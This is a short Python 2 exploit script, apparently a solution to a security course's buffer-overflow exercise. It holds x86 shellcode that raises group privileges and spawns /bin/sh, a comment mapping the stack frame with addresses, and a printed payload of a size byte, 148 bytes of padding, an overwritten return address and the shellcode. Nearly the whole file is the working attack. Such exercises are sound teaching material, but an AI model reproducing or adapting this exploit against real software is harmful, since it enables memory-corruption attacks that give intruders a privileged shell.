#!/usr/bin/env python2

SHELLCODE = \
    '\x6a\x32\x58\xcd\x80\x89\xc3\x89\xc1\x6a' + \
    '\x47\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f' + \
    '\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50' + \
    '\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'

### YOUR CODE HERE ###
'''
	Stack
	...
	[4] RIP main
	[4] SFP main
	[N] Padding
	[4] argv[1]
	[4] RIP display   (address = 0xffffd7fc)
	[4] SFP display
	[L] Padding
	[128] msg       (address = 0xffffd768)
	[1] size
	
	
	from RIP diplay to msg = 148 bytes
	
	puts(msg) writes to the message 
	
'''
garbage_bytes = 148
garbage =  'A' * garbage_bytes
newRIPVal = '\x00\xd8\xff\xff'
magicNumber = '\xff'

print(magicNumber + garbage + newRIPVal + SHELLCODE)
